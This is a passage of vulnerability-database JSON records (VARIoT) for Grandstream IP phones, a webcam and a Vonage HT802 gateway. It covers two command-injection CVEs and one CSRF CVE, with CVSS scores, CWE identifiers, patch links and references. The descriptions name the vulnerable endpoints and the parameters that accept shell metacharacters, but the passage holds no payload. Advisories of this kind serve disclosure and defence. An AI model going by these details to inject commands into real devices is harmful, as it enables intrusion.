"cpe23Uri": "cpe:2.3:h:grandstream:wp820:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10659"
}
]
},
"cve": "CVE-2019-10659",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-10659",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-42880",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-10659",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10659",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-42880",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1224",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42880"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003020"
},
{
"db": "NVD",
"id": "CVE-2019-10659"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1224"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXV3370 before 1.0.1.41 and WP820 before 1.0.3.6 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in a /manager?action=getlogcat priority field. Grandstream GXV3370 and WP820 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Both Grandstream GXV3370 and Grandstream WP820 are products of Grandstream. Grandstream GXV3370 is an IP video phone device. Grandstream WP820 is a portable business WiFi phone. \n\nThere are security vulnerabilities in Grandstream GXV3370 versions before 1.0.1.41 and WP820 versions before 1.0.3.6. An attacker could use this vulnerability to execute an illegal command",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10659"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003020"
},
{
"db": "CNVD",
"id": "CNVD-2019-42880"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10659",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003020",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-42880",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1224",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42880"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003020"
},
{
"db": "NVD",
"id": "CVE-2019-10659"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1224"
}
]
},
"id": "VAR-201903-1402",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42880"
}
],
"trust": 1.2666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42880"
}
]
},
"last_update_date": "2023-12-18T12:50:24.031000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream GXV3370 and Grandstream WP820 command injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/192497"
},
{
"title": "Grandstream GXV3370 and Grandstream WP820 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=90908"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42880"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003020"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1224"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003020"
},
{
"db": "NVD",
"id": "CVE-2019-10659"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://github.com/scarvell/grandstream_exploits"
},
{
"trust": 1.6,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl=1"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10659"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10659"
},
{
"trust": 0.8,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920"
},
{
"trust": 0.6,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl;=1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42880"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003020"
},
{
"db": "NVD",
"id": "CVE-2019-10659"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1224"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-42880"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003020"
},
{
"db": "NVD",
"id": "CVE-2019-10659"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1224"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-42880"
},
{
"date": "2019-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003020"
},
{
"date": "2019-03-30T17:29:00.557000",
"db": "NVD",
"id": "CVE-2019-10659"
},
{
"date": "2019-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1224"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-42880"
},
{
"date": "2019-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003020"
},
{
"date": "2023-03-01T14:49:46.350000",
"db": "NVD",
"id": "CVE-2019-10659"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1224"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1224"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXV3370 and WP820 Command injection vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003020"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1224"
}
],
"trust": 0.6
}
}
VAR-201711-0060
Vulnerability from variot - Updated: 2023-12-18 12:44Cross-Site Request Forgery (CSRF) in the Basic Settings screen on Vonage (Grandstream) HT802 devices allows attackers to modify settings, related to cgi-bin/update. Vonage (Grandstream) HT802 The device contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Vonage (Grandstream) HT802devices is a home gateway device from Vonage, USA. A remote attacker can exploit this vulnerability to change settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-0060",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ht802",
"scope": "eq",
"trust": 1.6,
"vendor": "grandstream",
"version": null
},
{
"model": "ht802",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "ht802",
"scope": null,
"trust": 0.6,
"vendor": "vonage",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36344"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009938"
},
{
"db": "NVD",
"id": "CVE-2017-16563"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-201"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ht802_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ht802:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16563"
}
]
},
"cve": "CVE-2017-16563",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-16563",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "CNVD-2017-36344",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "VHN-107498",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.0,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-16563",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-16563",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-36344",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201711-201",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-107498",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36344"
},
{
"db": "VULHUB",
"id": "VHN-107498"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009938"
},
{
"db": "NVD",
"id": "CVE-2017-16563"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-201"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-Site Request Forgery (CSRF) in the Basic Settings screen on Vonage (Grandstream) HT802 devices allows attackers to modify settings, related to cgi-bin/update. Vonage (Grandstream) HT802 The device contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Vonage (Grandstream) HT802devices is a home gateway device from Vonage, USA. A remote attacker can exploit this vulnerability to change settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16563"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009938"
},
{
"db": "CNVD",
"id": "CNVD-2017-36344"
},
{
"db": "VULHUB",
"id": "VHN-107498"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-16563",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009938",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201711-201",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-36344",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-107498",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36344"
},
{
"db": "VULHUB",
"id": "VHN-107498"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009938"
},
{
"db": "NVD",
"id": "CVE-2017-16563"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-201"
}
]
},
"id": "VAR-201711-0060",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36344"
},
{
"db": "VULHUB",
"id": "VHN-107498"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36344"
}
]
},
"last_update_date": "2023-12-18T12:44:21.370000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-009938"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-107498"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009938"
},
{
"db": "NVD",
"id": "CVE-2017-16563"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://distributedcompute.com/2017/11/04/vonage-ht802-multiple-vulnerabilities/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-16563"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16563"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36344"
},
{
"db": "VULHUB",
"id": "VHN-107498"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009938"
},
{
"db": "NVD",
"id": "CVE-2017-16563"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-201"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-36344"
},
{
"db": "VULHUB",
"id": "VHN-107498"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009938"
},
{
"db": "NVD",
"id": "CVE-2017-16563"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-201"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-36344"
},
{
"date": "2017-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-107498"
},
{
"date": "2017-11-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-009938"
},
{
"date": "2017-11-06T08:29:00.253000",
"db": "NVD",
"id": "CVE-2017-16563"
},
{
"date": "2017-11-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-201"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-36344"
},
{
"date": "2017-11-27T00:00:00",
"db": "VULHUB",
"id": "VHN-107498"
},
{
"date": "2017-11-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-009938"
},
{
"date": "2017-11-27T23:21:18.463000",
"db": "NVD",
"id": "CVE-2017-16563"
},
{
"date": "2017-11-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-201"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-201"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vonage HT802 Device cross-site request forgery vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-009938"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-201"
}
],
"trust": 0.6
}
}
VAR-201903-1403
Vulnerability from variot - Updated: 2023-12-18 12:43Grandstream GXV3611IR_HD before 1.0.3.23 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the /goform/systemlog?cmd=set logserver field. Grandstream GXV3611IR_HD The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GXV3611IR_HD is a webcam from Grandstream.
There are security vulnerabilities in Grandstream GXV3611IR_HD versions before 1.0.3.23. An attacker could use this vulnerability to execute an illegal command
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-1403",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gxv3611ir hd",
"scope": "lt",
"trust": 2.4,
"vendor": "grandstream",
"version": "1.0.3.23"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42876"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003012"
},
{
"db": "NVD",
"id": "CVE-2019-10660"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
